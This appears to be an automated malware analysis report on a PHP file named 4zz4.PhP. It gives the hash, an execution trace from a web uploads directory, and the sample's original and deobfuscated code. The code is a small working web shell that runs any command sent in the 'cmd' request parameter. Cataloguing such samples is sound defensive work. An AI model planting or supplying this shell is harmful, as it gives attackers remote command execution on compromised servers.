PHP Malware Analysis

4zz4.PhP

md5: 5b0da6ca64e9a4156977819c363585cd

Jump to:

Screenshot


Attributes

Execution


Deobfuscated PHP code


<?php 
if (isset($_REQUEST['cmd'])) {
    echo "<pre>";
    $cmd = $_REQUEST['cmd'];
    system($cmd);
    echo "</pre>";
    die;
}
?>


Execution traces

data/traces/5b0da6ca64e9a4156977819c363585cd_trace-1676252649.2992.xt
Version: 3.1.0beta2
File format: 4
TRACE START [2023-02-12 23:44:35.197053]
1	0	1	0.000145	393512
1	3	0	0.000200	394816	{main}	1		/var/www/html/uploads/4zz4.PhP	0	0
1	3	1	0.000218	394816
			0.000244	314224
TRACE END   [2023-02-12 23:44:35.197180]


Generated HTML code

<html><head></head><body></body></html>

Original PHP code


<?php

if(isset($_REQUEST['cmd'])){
        echo "<pre>";
        $cmd = ($_REQUEST['cmd']);
        system($cmd);
        echo "</pre>";
        die;
}

?>